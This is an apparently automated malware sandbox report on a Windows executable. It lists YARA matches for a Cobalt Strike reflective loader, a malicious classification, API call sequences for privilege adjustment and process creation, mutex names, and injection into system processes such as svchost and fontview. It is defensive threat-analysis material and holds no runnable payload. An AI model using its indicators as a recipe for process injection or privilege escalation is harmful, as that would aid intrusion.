Source: 1.2.svchost.exe.1ad8b7f0000.6.raw.unpack, type: UNPACKEDPE	Matched rule: WiltedTulip_ReflectiveLoader date = 2017-07-23, hash5 = eee430003e7d59a431d1a60d45e823d4afb0d69262cc5e0c79f345aa37333a89, hash4 = cf7c754ceece984e6fa0d799677f50d93133db609772c7a2226e7746e6d046f0, hash3 = a159a9bfb938de686f6aced37a2f7fa62d6ff5e702586448884b70804882b32f, hash2 = 1f52d643e8e633026db73db55eb1848580de00a203ee46263418f02c6bdb8c7a, hash1 = 1097bf8f5b832b54c81c1708327a54a88ca09f7bdab4571f1a335cc26bbd7904, author = Florian Roth, description = Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, reference = http://www.clearskysec.com/tulip, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 1.2.svchost.exe.1ad8b7f0000.6.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 1.3.svchost.exe.1ad894834c8.0.raw.unpack, type: UNPACKEDPE	Matched rule: WiltedTulip_ReflectiveLoader date = 2017-07-23, hash5 = eee430003e7d59a431d1a60d45e823d4afb0d69262cc5e0c79f345aa37333a89, hash4 = cf7c754ceece984e6fa0d799677f50d93133db609772c7a2226e7746e6d046f0, hash3 = a159a9bfb938de686f6aced37a2f7fa62d6ff5e702586448884b70804882b32f, hash2 = 1f52d643e8e633026db73db55eb1848580de00a203ee46263418f02c6bdb8c7a, hash1 = 1097bf8f5b832b54c81c1708327a54a88ca09f7bdab4571f1a335cc26bbd7904, author = Florian Roth, description = Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, reference = http://www.clearskysec.com/tulip, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 1.3.svchost.exe.1ad894834c8.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 3.3.control.exe.b107f8.0.raw.unpack, type: UNPACKEDPE	Matched rule: WiltedTulip_ReflectiveLoader date = 2017-07-23, hash5 = eee430003e7d59a431d1a60d45e823d4afb0d69262cc5e0c79f345aa37333a89, hash4 = cf7c754ceece984e6fa0d799677f50d93133db609772c7a2226e7746e6d046f0, hash3 = a159a9bfb938de686f6aced37a2f7fa62d6ff5e702586448884b70804882b32f, hash2 = 1f52d643e8e633026db73db55eb1848580de00a203ee46263418f02c6bdb8c7a, hash1 = 1097bf8f5b832b54c81c1708327a54a88ca09f7bdab4571f1a335cc26bbd7904, author = Florian Roth, description = Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, reference = http://www.clearskysec.com/tulip, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 3.3.control.exe.b107f8.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 1.3.svchost.exe.1ad89460818.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 0.2.1731043030539.exe.7ff6e5365cd0.1.raw.unpack, type: UNPACKEDPE	Matched rule: WiltedTulip_ReflectiveLoader date = 2017-07-23, hash5 = eee430003e7d59a431d1a60d45e823d4afb0d69262cc5e0c79f345aa37333a89, hash4 = cf7c754ceece984e6fa0d799677f50d93133db609772c7a2226e7746e6d046f0, hash3 = a159a9bfb938de686f6aced37a2f7fa62d6ff5e702586448884b70804882b32f, hash2 = 1f52d643e8e633026db73db55eb1848580de00a203ee46263418f02c6bdb8c7a, hash1 = 1097bf8f5b832b54c81c1708327a54a88ca09f7bdab4571f1a335cc26bbd7904, author = Florian Roth, description = Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, reference = http://www.clearskysec.com/tulip, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.1731043030539.exe.7ff6e5365cd0.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 1.2.svchost.exe.1ad8b170000.2.raw.unpack, type: UNPACKEDPE	Matched rule: WiltedTulip_ReflectiveLoader date = 2017-07-23, hash5 = eee430003e7d59a431d1a60d45e823d4afb0d69262cc5e0c79f345aa37333a89, hash4 = cf7c754ceece984e6fa0d799677f50d93133db609772c7a2226e7746e6d046f0, hash3 = a159a9bfb938de686f6aced37a2f7fa62d6ff5e702586448884b70804882b32f, hash2 = 1f52d643e8e633026db73db55eb1848580de00a203ee46263418f02c6bdb8c7a, hash1 = 1097bf8f5b832b54c81c1708327a54a88ca09f7bdab4571f1a335cc26bbd7904, author = Florian Roth, description = Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, reference = http://www.clearskysec.com/tulip, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 1.2.svchost.exe.1ad8b170000.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 0.2.1731043030539.exe.7ff6e5340000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 1.2.svchost.exe.1800280b0.1.raw.unpack, type: UNPACKEDPE	Matched rule: WiltedTulip_ReflectiveLoader date = 2017-07-23, hash5 = eee430003e7d59a431d1a60d45e823d4afb0d69262cc5e0c79f345aa37333a89, hash4 = cf7c754ceece984e6fa0d799677f50d93133db609772c7a2226e7746e6d046f0, hash3 = a159a9bfb938de686f6aced37a2f7fa62d6ff5e702586448884b70804882b32f, hash2 = 1f52d643e8e633026db73db55eb1848580de00a203ee46263418f02c6bdb8c7a, hash1 = 1097bf8f5b832b54c81c1708327a54a88ca09f7bdab4571f1a335cc26bbd7904, author = Florian Roth, description = Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, reference = http://www.clearskysec.com/tulip, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 1.2.svchost.exe.1800280b0.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 9.3.BackgroundTransferHost.exe.6b07f8.0.raw.unpack, type: UNPACKEDPE	Matched rule: WiltedTulip_ReflectiveLoader date = 2017-07-23, hash5 = eee430003e7d59a431d1a60d45e823d4afb0d69262cc5e0c79f345aa37333a89, hash4 = cf7c754ceece984e6fa0d799677f50d93133db609772c7a2226e7746e6d046f0, hash3 = a159a9bfb938de686f6aced37a2f7fa62d6ff5e702586448884b70804882b32f, hash2 = 1f52d643e8e633026db73db55eb1848580de00a203ee46263418f02c6bdb8c7a, hash1 = 1097bf8f5b832b54c81c1708327a54a88ca09f7bdab4571f1a335cc26bbd7904, author = Florian Roth, description = Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, reference = http://www.clearskysec.com/tulip, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 9.3.BackgroundTransferHost.exe.6b07f8.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 0.0.1731043030539.exe.7ff6e5340000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 1.2.svchost.exe.1ad8b650000.4.raw.unpack, type: UNPACKEDPE	Matched rule: WiltedTulip_ReflectiveLoader date = 2017-07-23, hash5 = eee430003e7d59a431d1a60d45e823d4afb0d69262cc5e0c79f345aa37333a89, hash4 = cf7c754ceece984e6fa0d799677f50d93133db609772c7a2226e7746e6d046f0, hash3 = a159a9bfb938de686f6aced37a2f7fa62d6ff5e702586448884b70804882b32f, hash2 = 1f52d643e8e633026db73db55eb1848580de00a203ee46263418f02c6bdb8c7a, hash1 = 1097bf8f5b832b54c81c1708327a54a88ca09f7bdab4571f1a335cc26bbd7904, author = Florian Roth, description = Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, reference = http://www.clearskysec.com/tulip, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 1.2.svchost.exe.1ad8b650000.4.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 6.3.fontview.exe.8207f8.0.raw.unpack, type: UNPACKEDPE	Matched rule: WiltedTulip_ReflectiveLoader date = 2017-07-23, hash5 = eee430003e7d59a431d1a60d45e823d4afb0d69262cc5e0c79f345aa37333a89, hash4 = cf7c754ceece984e6fa0d799677f50d93133db609772c7a2226e7746e6d046f0, hash3 = a159a9bfb938de686f6aced37a2f7fa62d6ff5e702586448884b70804882b32f, hash2 = 1f52d643e8e633026db73db55eb1848580de00a203ee46263418f02c6bdb8c7a, hash1 = 1097bf8f5b832b54c81c1708327a54a88ca09f7bdab4571f1a335cc26bbd7904, author = Florian Roth, description = Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, reference = http://www.clearskysec.com/tulip, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 6.3.fontview.exe.8207f8.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 0.0.1731043030539.exe.7ff6e5365cd0.1.raw.unpack, type: UNPACKEDPE	Matched rule: WiltedTulip_ReflectiveLoader date = 2017-07-23, hash5 = eee430003e7d59a431d1a60d45e823d4afb0d69262cc5e0c79f345aa37333a89, hash4 = cf7c754ceece984e6fa0d799677f50d93133db609772c7a2226e7746e6d046f0, hash3 = a159a9bfb938de686f6aced37a2f7fa62d6ff5e702586448884b70804882b32f, hash2 = 1f52d643e8e633026db73db55eb1848580de00a203ee46263418f02c6bdb8c7a, hash1 = 1097bf8f5b832b54c81c1708327a54a88ca09f7bdab4571f1a335cc26bbd7904, author = Florian Roth, description = Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, reference = http://www.clearskysec.com/tulip, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.0.1731043030539.exe.7ff6e5365cd0.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 1.2.svchost.exe.1ad8b580000.3.raw.unpack, type: UNPACKEDPE	Matched rule: WiltedTulip_ReflectiveLoader date = 2017-07-23, hash5 = eee430003e7d59a431d1a60d45e823d4afb0d69262cc5e0c79f345aa37333a89, hash4 = cf7c754ceece984e6fa0d799677f50d93133db609772c7a2226e7746e6d046f0, hash3 = a159a9bfb938de686f6aced37a2f7fa62d6ff5e702586448884b70804882b32f, hash2 = 1f52d643e8e633026db73db55eb1848580de00a203ee46263418f02c6bdb8c7a, hash1 = 1097bf8f5b832b54c81c1708327a54a88ca09f7bdab4571f1a335cc26bbd7904, author = Florian Roth, description = Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, reference = http://www.clearskysec.com/tulip, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 1.2.svchost.exe.1ad8b580000.3.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 1.2.svchost.exe.1ad8b720000.5.raw.unpack, type: UNPACKEDPE	Matched rule: WiltedTulip_ReflectiveLoader date = 2017-07-23, hash5 = eee430003e7d59a431d1a60d45e823d4afb0d69262cc5e0c79f345aa37333a89, hash4 = cf7c754ceece984e6fa0d799677f50d93133db609772c7a2226e7746e6d046f0, hash3 = a159a9bfb938de686f6aced37a2f7fa62d6ff5e702586448884b70804882b32f, hash2 = 1f52d643e8e633026db73db55eb1848580de00a203ee46263418f02c6bdb8c7a, hash1 = 1097bf8f5b832b54c81c1708327a54a88ca09f7bdab4571f1a335cc26bbd7904, author = Florian Roth, description = Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, reference = http://www.clearskysec.com/tulip, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 1.2.svchost.exe.1ad8b720000.5.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 10.3.raserver.exe.2ac07f8.0.raw.unpack, type: UNPACKEDPE	Matched rule: WiltedTulip_ReflectiveLoader date = 2017-07-23, hash5 = eee430003e7d59a431d1a60d45e823d4afb0d69262cc5e0c79f345aa37333a89, hash4 = cf7c754ceece984e6fa0d799677f50d93133db609772c7a2226e7746e6d046f0, hash3 = a159a9bfb938de686f6aced37a2f7fa62d6ff5e702586448884b70804882b32f, hash2 = 1f52d643e8e633026db73db55eb1848580de00a203ee46263418f02c6bdb8c7a, hash1 = 1097bf8f5b832b54c81c1708327a54a88ca09f7bdab4571f1a335cc26bbd7904, author = Florian Roth, description = Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, reference = http://www.clearskysec.com/tulip, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 10.3.raserver.exe.2ac07f8.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 1.2.svchost.exe.1ad8b7f0000.6.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 1.2.svchost.exe.1ad8b720000.5.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 1.2.svchost.exe.1ad8b650000.4.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 1.2.svchost.exe.180000000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 1.3.svchost.exe.1ad89460818.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 3.3.control.exe.b107f8.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 10.3.raserver.exe.2ac07f8.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 1.2.svchost.exe.1ad8b170000.2.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 8.3.resmon.exe.23007f8.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 9.3.BackgroundTransferHost.exe.6b07f8.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 0.0.1731043030539.exe.7ff6e5365cd0.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 9.2.BackgroundTransferHost.exe.10000000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 6.3.fontview.exe.8207f8.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 0.2.1731043030539.exe.7ff6e5365cd0.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 3.2.control.exe.10000000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 6.2.fontview.exe.10000000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 1.2.svchost.exe.1800280b0.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 10.2.raserver.exe.10000000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 1.3.svchost.exe.1ad894834c8.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 8.2.resmon.exe.10000000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 1.2.svchost.exe.1ad8b580000.3.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 00000001.00000002.3294945185.000001AD8B720000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: WiltedTulip_ReflectiveLoader date = 2017-07-23, hash5 = eee430003e7d59a431d1a60d45e823d4afb0d69262cc5e0c79f345aa37333a89, hash4 = cf7c754ceece984e6fa0d799677f50d93133db609772c7a2226e7746e6d046f0, hash3 = a159a9bfb938de686f6aced37a2f7fa62d6ff5e702586448884b70804882b32f, hash2 = 1f52d643e8e633026db73db55eb1848580de00a203ee46263418f02c6bdb8c7a, hash1 = 1097bf8f5b832b54c81c1708327a54a88ca09f7bdab4571f1a335cc26bbd7904, author = Florian Roth, description = Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, reference = http://www.clearskysec.com/tulip, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000001.00000002.3294945185.000001AD8B720000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 00000001.00000002.3294301221.000001AD8B170000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: WiltedTulip_ReflectiveLoader date = 2017-07-23, hash5 = eee430003e7d59a431d1a60d45e823d4afb0d69262cc5e0c79f345aa37333a89, hash4 = cf7c754ceece984e6fa0d799677f50d93133db609772c7a2226e7746e6d046f0, hash3 = a159a9bfb938de686f6aced37a2f7fa62d6ff5e702586448884b70804882b32f, hash2 = 1f52d643e8e633026db73db55eb1848580de00a203ee46263418f02c6bdb8c7a, hash1 = 1097bf8f5b832b54c81c1708327a54a88ca09f7bdab4571f1a335cc26bbd7904, author = Florian Roth, description = Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, reference = http://www.clearskysec.com/tulip, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000001.00000002.3294301221.000001AD8B170000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 00000001.00000002.3295082959.000001AD8B7F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: WiltedTulip_ReflectiveLoader date = 2017-07-23, hash5 = eee430003e7d59a431d1a60d45e823d4afb0d69262cc5e0c79f345aa37333a89, hash4 = cf7c754ceece984e6fa0d799677f50d93133db609772c7a2226e7746e6d046f0, hash3 = a159a9bfb938de686f6aced37a2f7fa62d6ff5e702586448884b70804882b32f, hash2 = 1f52d643e8e633026db73db55eb1848580de00a203ee46263418f02c6bdb8c7a, hash1 = 1097bf8f5b832b54c81c1708327a54a88ca09f7bdab4571f1a335cc26bbd7904, author = Florian Roth, description = Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, reference = http://www.clearskysec.com/tulip, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000001.00000002.3295082959.000001AD8B7F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 00000001.00000002.3294759739.000001AD8B650000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: WiltedTulip_ReflectiveLoader date = 2017-07-23, hash5 = eee430003e7d59a431d1a60d45e823d4afb0d69262cc5e0c79f345aa37333a89, hash4 = cf7c754ceece984e6fa0d799677f50d93133db609772c7a2226e7746e6d046f0, hash3 = a159a9bfb938de686f6aced37a2f7fa62d6ff5e702586448884b70804882b32f, hash2 = 1f52d643e8e633026db73db55eb1848580de00a203ee46263418f02c6bdb8c7a, hash1 = 1097bf8f5b832b54c81c1708327a54a88ca09f7bdab4571f1a335cc26bbd7904, author = Florian Roth, description = Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, reference = http://www.clearskysec.com/tulip, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000001.00000002.3294759739.000001AD8B650000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 00000001.00000002.3294544294.000001AD8B580000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: WiltedTulip_ReflectiveLoader date = 2017-07-23, hash5 = eee430003e7d59a431d1a60d45e823d4afb0d69262cc5e0c79f345aa37333a89, hash4 = cf7c754ceece984e6fa0d799677f50d93133db609772c7a2226e7746e6d046f0, hash3 = a159a9bfb938de686f6aced37a2f7fa62d6ff5e702586448884b70804882b32f, hash2 = 1f52d643e8e633026db73db55eb1848580de00a203ee46263418f02c6bdb8c7a, hash1 = 1097bf8f5b832b54c81c1708327a54a88ca09f7bdab4571f1a335cc26bbd7904, author = Florian Roth, description = Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, reference = http://www.clearskysec.com/tulip, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000001.00000002.3294544294.000001AD8B580000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts

Source: classification engine

Classification label: mal100.evad.winEXE@13/1@1/1

Source: C:\Users\user\Desktop\1731043030539.exe	Code function: 0_2_00007FF6E53411CB GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,CloseHandle,wsprintfW,lstrlenW,OpenProcess,CloseHandle,wsprintfW,wsprintfW,wsprintfW,wsprintfW,wsprintfW,OpenProcess,InitializeProcThreadAttributeList,GlobalAlloc,InitializeProcThreadAttributeList,UpdateProcThreadAttribute,lstrcpyW,CreateProcessW,CloseHandle,CloseHandle,CloseHandle,DeleteProcThreadAttributeList,GlobalFree,CloseHandle,wsprintfW,wsprintfW,OpenProcess,CloseHandle,OpenProcess,CloseHandle,wsprintfW,wsprintfW,OpenProcess,OpenProcess,CloseHandle,wsprintfW,wsprintfW,PathFindFileNameW,InitializeProcThreadAttributeList,GlobalAlloc,InitializeProcThreadAttributeList,UpdateProcThreadAttribute,lstrcpyW,CreateProcessW,CloseHandle,CloseHandle,CloseHandle,DeleteProcThreadAttributeList,GlobalFree,CloseHandle,wsprintfW,wsprintfW,OpenProcess,CloseHandle,wsprintfW,	0_2_00007FF6E53411CB
Source: C:\Windows\System32\svchost.exe	Code function: 1_2_0000000180003D40 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,	1_2_0000000180003D40
Source: C:\Windows\SysWOW64\control.exe	Code function: 3_2_1001C2A5 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,	3_2_1001C2A5
Source: C:\Windows\SysWOW64\fontview.exe	Code function: 6_2_1001C2A5 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,	6_2_1001C2A5
Source: C:\Windows\SysWOW64\resmon.exe	Code function: 8_2_1001C2A5 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,	8_2_1001C2A5
Source: C:\Windows\SysWOW64\BackgroundTransferHost.exe	Code function: 9_2_1001C2A5 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,	9_2_1001C2A5
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 10_2_1001C2A5 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,	10_2_1001C2A5

Source: C:\Users\user\Desktop\1731043030539.exe

Code function: 0_2_00007FF6E5341CE0 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,

0_2_00007FF6E5341CE0

Source: C:\Windows\System32\svchost.exe

Code function: 1_2_0000000180002D50 FindResourceExA,LoadResource,LockResource,SizeofResource,VirtualAlloc,

1_2_0000000180002D50

Source: C:\Windows\SysWOW64\raserver.exe	Mutant created: \Sessions\1\BaseNamedObjects\bbbd5638c623ee45d1ee4383bacc9ed0
Source: C:\Windows\SysWOW64\BackgroundTransferHost.exe	Mutant created: \Sessions\1\BaseNamedObjects\555prc4xnupdZBYhEwDqEp
Source: C:\Windows\SysWOW64\control.exe	Mutant created: \Sessions\1\BaseNamedObjects\a5f174079a38c6daa9bd512a0b3dd3e7
Source: C:\Windows\SysWOW64\BackgroundTransferHost.exe	Mutant created: \Sessions\1\BaseNamedObjects\1Xti92xm7E
Source: C:\Windows\System32\svchost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\5b32ca781b2a21c0b0fe4d086add70ca
Source: C:\Windows\SysWOW64\raserver.exe	Mutant created: \Sessions\1\BaseNamedObjects\Kc143hk1yh
Source: C:\Windows\SysWOW64\resmon.exe	Mutant created: \Sessions\1\BaseNamedObjects\555prc4xnupdjORyUBzgr
Source: C:\Windows\SysWOW64\raserver.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\bbbd5638c623ee45d1ee4383bacc9ed0
Source: C:\Windows\SysWOW64\control.exe	Mutant created: \Sessions\1\BaseNamedObjects\4a15df8f8d25cd9eba3e2f86695e0e01
Source: C:\Windows\SysWOW64\fontview.exe	Mutant created: \Sessions\1\BaseNamedObjects\3bjCXr518T
Source: C:\Windows\SysWOW64\fontview.exe	Mutant created: \Sessions\1\BaseNamedObjects\555prc4xnupdQALoBA
Source: C:\Users\user\Desktop\1731043030539.exe	Mutant created: \Sessions\1\BaseNamedObjects\9E4DF875-E953-E4A0-C5A4-989566D33EC8
Source: C:\Windows\SysWOW64\raserver.exe	Mutant created: \Sessions\1\BaseNamedObjects\3afd58813a8c841692dabe2f6ea36d7d
Source: C:\Windows\SysWOW64\BackgroundTransferHost.exe	Mutant created: \Sessions\1\BaseNamedObjects\81eabae79ab132e78d7ad2d9d2894f90
Source: C:\Windows\SysWOW64\control.exe	Mutant created: \Sessions\1\BaseNamedObjects\89c093d255b643bbbe95a3554f1c7508
Source: C:\Windows\SysWOW64\resmon.exe	Mutant created: \Sessions\1\BaseNamedObjects\Y9fG7D0WAW
Source: C:\Windows\System32\svchost.exe	Mutant created: \Sessions\1\BaseNamedObjects\5b32ca781b2a21c0b0fe4d086add70ca
Source: C:\Windows\SysWOW64\control.exe	Mutant created: \Sessions\1\BaseNamedObjects\555prc4xnupdjQBi
Source: C:\Windows\SysWOW64\raserver.exe	Mutant created: \Sessions\1\BaseNamedObjects\555prc4xnupdshWsX
Source: C:\Windows\SysWOW64\control.exe	Mutant created: \Sessions\1\BaseNamedObjects\OTTuH8jClJ
Source: C:\Windows\SysWOW64\BackgroundTransferHost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\81eabae79ab132e78d7ad2d9d2894f90

Source: C:\Users\user\Desktop\1731043030539.exe

File created: C:\Users\user\AppData\Local\Temp\9E4DF875-E953-E4A0-C5A4-989566D33EC8.tmp

Jump to behavior

Source: 1731043030539.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\explorer.exe

File read: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\1731043030539.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: 1731043030539.exe	Virustotal: Detection: 61%
Source: 1731043030539.exe	ReversingLabs: Detection: 65%

Source: unknown	Process created: C:\Users\user\Desktop\1731043030539.exe "C:\Users\user\Desktop\1731043030539.exe"
Source: C:\Users\user\Desktop\1731043030539.exe	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalServiceNetwork -p
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\control.exe C:\Windows\SysWOW64\control.exe
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\fontview.exe C:\Windows\SysWOW64\fontview.exe
